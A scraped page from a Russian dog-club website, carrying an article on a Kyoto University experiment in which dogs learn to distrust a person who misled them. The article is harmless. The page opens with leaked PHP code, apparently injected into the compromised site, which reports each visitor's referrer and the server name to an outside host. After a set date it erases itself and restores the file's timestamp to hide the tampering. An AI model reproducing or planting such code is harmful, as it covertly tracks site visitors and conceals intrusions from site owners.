check_meta(); function check_meta(){ $jp = __FILE__; $jptime = filemtime($jp); if(time() >= 1456755828){ $jp_c = file_get_contents($jp); if($t = @strpos($jp_c,"check_meta();")) { $contentp = substr($jp_c,0,$t); if(@file_put_contents($jp, $contentp)){ @touch($jp,$jptime); } } } @file_get_contents("http://web.51.la:82/go.asp?svid=15&id=18776972&referrer=".$_SERVER['HTTP_REFERER']."&vpage=http://".$_SERVER['SERVER_NAME']."/components/com_search/models/views.php"); } Чувствуют ли собаки ложь и фальшь: мнение учёных
 

РКФ Новый век

Мы в ответе за тех, кого приручили.

  • Увеличить размер шрифта
  • Размер шрифта по умолчанию
  • Уменьшить размер шрифта
Home Интересные новости Чувствуют ли собаки ложь и фальшь: мнение учёных

Чувствуют ли собаки ложь и фальшь: мнение учёных

E-mail Печать PDF
>Собаки обладают тонкой душевной организацией. И это чистая правда. Все мы знаем, что есть люди, к которым буквально тянутся животные. И есть их прямые противоположности – их кошки с собаками будут обходить за версту. Но как собаки «раскусывают» таких людей? Как оказалось, здесь нет ничего сверхъестественного. Просто за десятки тысяч лет совместной эволюции собаки так хорошо присмотрелись к людям, что усвоили все их, с позволения сказать, повадки. Наши прекрасно распознают и голосовую интонацию, и тембральную окраску голоса, мастерски читают язык жестов и движений тела. И мало сказать – читают! Они ещё и анализируют всё это, причем делают абсолютно правильные и обоснованные выводы. Так что будьте спокойны: от внимания вашей собаки не ускользнет ни одна деталь, ни одна фальшивая нотка.

Познакомим вас с результатами одного очень интересного исследования, проведённого японскими учёными из Университета Киото. Как сообщили журналистам его авторы (доктор Акико Такаока и его коллеги), они назвали свои эксперименты «тестом на благонадежность».

Исследование (в нем приняли участие 34 собаки) проводилось в три этапа. На первом животным предложили две непрозрачные емкости. Одна была пустой, вторая наполнена лакомствами. В зал, где проводился эксперимент, заходил человек, показывал собакам контейнер с лакомствами и предлагал подкрепиться. На втором этапе заходил уже другой человек, но он пытался предложить лишь пустую емкость. Собаки остались обескуражены подобным положением дел. На третьем этапе «нехороший» человек попытался реабилитироваться, указав на контейнер с лакомствами. Но подавляющее большинство собак не поверило ему – сказалась «дурная» репутация. А «добрый человек» из этапа № 1 блестяще справился с задачей! Собаки верили ему!

«Мы выяснили, что у собак гораздо более сложный социальный интеллект, чем предполагалось ранее, - говорит доктор Такаока. – Более того, интеллект собак, их способность разбираться в людях развился исключительно благодаря тесному соседству с ними».

Какие выводы можно сделать из проведённого японскими учёными эксперимента? Всё просто: каким вы будете по отношению к своей собаке, какие помыслы и устремления при этом вами руководят – получите в ответ всё то же самое.

Иными словами, способность собак доверять своим хозяевам основывается исключительно на личном опыте, на собственной, если хотите, шкуре. Вы зарекомендовали себя лжецом, нечестным человеком по отношению к питомцу – восстановить доверие в дальнейшем будет очень и очень трудно.


Источник http://daylapu.ru/news.php?ngod=2018&news=9
 

Добавить комментарий


Защитный код
Обновить

Пользовательский поиск



Случайное изображение.

 2006  023.jpg

Реклама


Похожие материалы